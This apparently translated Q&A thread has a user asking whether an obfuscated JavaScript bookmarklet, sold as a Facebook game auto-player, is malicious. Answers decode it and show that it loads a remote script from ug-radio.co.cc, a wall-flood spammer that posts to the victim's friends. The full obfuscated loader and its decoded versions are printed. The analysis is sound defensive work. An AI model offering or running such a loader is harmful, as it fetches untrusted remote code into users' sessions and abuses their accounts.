有人可以解密这个JavaScript

时间:2011-07-02 11:59:04

标签: javascript

我发现它在一个论坛告诉我这个代码会给我自己玩Facebook游戏,但我担心这不是他们说的,我担心这是恶意脚本

请帮助:)

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);

5 个答案:

答案 0 :(得分:12)

让我们首先解码转义序列,并删除_0x8dd5变量名称:

var x=[
  "src","script","createElement","http://ug-radio.co.cc/flood.js",
  "appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);

从数组中替换字符串,您将得到:

(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);

所以,脚本的作用很简单:

a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);

即。它会在页面中加载Javascript http://ug-radio.co.cc/flood.js

查看加载文件中的脚本,它将自己称为“Wallflood By X-Cisadane”。它似乎得到了你的朋友列表,并向所有人发布了一条消息(或者可能来自)。

当然与游戏的自动游戏无关。

答案 1 :(得分:7)

我打开了firebug,并将部分脚本粘贴到控制台中(注意只粘贴创建变量的部分,而不是运行代码)。这就是我得到的:

我粘贴的内容:

console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);

结果:

["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]

简而言之,这看起来像是从具有非常狡猾的域名的远程服务器加载外部Javascript文件的脚本。

有一些字符未完全转换为您所期望的字符。这可能是拼写错误(不太可能)或故意进一步混淆,以欺骗任何自动恶意软件检查程序查找包含URL或createElement等引用的脚本。脚本的其余部分在运行之前将这些字符单独修复回原位。

变量名_0x8dd5被选择为看起来像十六进制代码,并使整个事情更难阅读,但实际上它只是一个常规的Javascript变量名。它在脚本的其余部分重复引用,因为它将字符从字符串的一部分复制到另一部分以修复故意的间隙。

绝对是恶意脚本。

我建议立即刻录! ; - )

答案 2 :(得分:4)

嗯,声明的var实际上是这样的:

var _0x8dd5= [
    'src', 'script', 'cx7 2eateElement',
    'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];

其余的很容易理解。

答案 3 :(得分:1)

您的第一个声明是设置一个大致包含以下内容的数组:

var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];

我说“粗略”,因为我使用Chrome的JavaScript控制台来解析数据,有些事情似乎有点乱码。我尽可能地清理了乱码部分。

其余的似乎是在调用以下内容:

var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);

基本上,它是在文档中添加(可能是恶意的)脚本。

答案 4 :(得分:1)

你很可能知道如何解码它或如何编码,但对于那些不确定的,它只是2位十六进制转义序列。它也可以是使用\ udddd的4位数字(例如“\ u0032”为“2”)或\ ddd表示八进制。

Decoding hex string in javascript

相关问题
最新问题